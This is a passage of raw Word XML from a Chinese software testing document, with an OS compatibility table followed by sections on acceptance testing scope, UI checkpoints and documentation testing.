            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04CFD1D4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Redhat7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33B160D9"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DD2C77" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15038196" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="324D3A7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57C9B3B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Suse12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FFF3E73"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E0BC7FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="42DE3905" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="428F2112" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07F4979E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Centos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D694756" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AE29E42" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="596A9004" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623E55FF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C760808" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>麒麟系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271EE011"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6686B8C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1A431859" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="715"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6823C35D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F0AC5CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00751612" w:rsidP="00A5661A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId125" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
              <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
                <w:rPr>
                  <w:rStyle w:val="af3"/>
                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>Deepin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（深度）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B52ABA7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D8FF444" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269AC34D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B09CABA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>详见：持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3047B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBFC464" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc36487995"/>
      <w:bookmarkStart w:id="445" w:name="_Toc36573263"/>
      <w:bookmarkStart w:id="446" w:name="_Toc36630349"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验收测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
      <w:bookmarkEnd w:id="445"/>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="76DE04C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc36487996"/>
      <w:bookmarkStart w:id="448" w:name="_Toc36573264"/>
      <w:bookmarkStart w:id="449" w:name="_Toc36630350"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
      <w:bookmarkEnd w:id="448"/>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="3E69EE9B"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验收测试即由产品开发方按照需求文档中所有内容（或按合同及其它有效约定，对方承诺实现的需求）进行开发、内测完毕，提交版本符合验收测试标准，通过验收小组进行的测试。通过验收测试判断产品质量是否符合产品需求，功能实现是否正确并可以最终上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F37FA9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc36487997"/>
      <w:bookmarkStart w:id="451" w:name="_Toc36573265"/>
      <w:bookmarkStart w:id="452" w:name="_Toc36630351"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
      <w:bookmarkEnd w:id="451"/>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="18753796"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通过验收测试判断产品质量是否符合产品需求、功能实现是否正确，性能和安全性方面是否符合发布标准，并且产品可以最终上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E22A04" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc36487998"/>
      <w:bookmarkStart w:id="454" w:name="_Toc36573266"/>
      <w:bookmarkStart w:id="455" w:name="_Toc36630352"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
      <w:bookmarkEnd w:id="454"/>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="7672CD74" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>软件开发方技术、测试、运维、产品及其它业务相关人员；软件的使用方产品部、技术部、运维部及其</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>它部门</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>项目对接人员，共同完成验收测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40D62D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc36487999"/>
      <w:bookmarkStart w:id="457" w:name="_Toc36573267"/>
      <w:bookmarkStart w:id="458" w:name="_Toc36630353"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试依据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
      <w:bookmarkEnd w:id="457"/>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="2B6539B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>国家规范、行业标准、合同条款、用户确认的需求规格说明书、UI设计文档、测试用例等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563F240" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="459" w:name="_Toc36488000"/>
      <w:bookmarkStart w:id="460" w:name="_Toc36573268"/>
      <w:bookmarkStart w:id="461" w:name="_Toc36630354"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="46517A1C"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界面测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC65D7D"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所有页面浏览，连接的正确、所有功能按钮及界面显示正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD4BAA"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功能测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CAEFF"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所有需求文档描述的功能实现正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2383E"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lastRenderedPageBreak/>
        <w:t>性能测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B946091"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重点业务功能、性能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>能</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>满足上线运营需求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56495D70"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安全性测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57926575"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接口和数据调用等方面符合安全性规范；没有安全性漏洞 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B1631" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc36488001"/>
      <w:r w:rsidRPr="00536672">
        <w:t>界面测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="299F23BA"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>下面是用户界面测试的要素：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A6CD0"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>符合标准和规范：良好的用户界面应该遵守操作系统的界面标准，比如在windows系统中，出现红色叉号对话框意味着严重警告或错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B477990"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检查点：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（1）直观性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F6BEB"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（2）一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（3）灵活性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（4）舒适性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（5）正确性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（6）实用性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116496B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc36488002"/>
      <w:r w:rsidRPr="00536672">
        <w:t>文档测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="5AF64B16" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>软件文档是软件的重要组成部分，文档错误也是软件缺陷。错误的解释可能会引导用户无法完成某些软件已有的功能。用户通过文档可以掌握具体的使用方法，提高了易用性。</w:t>
      </w:r>
    </w:p>
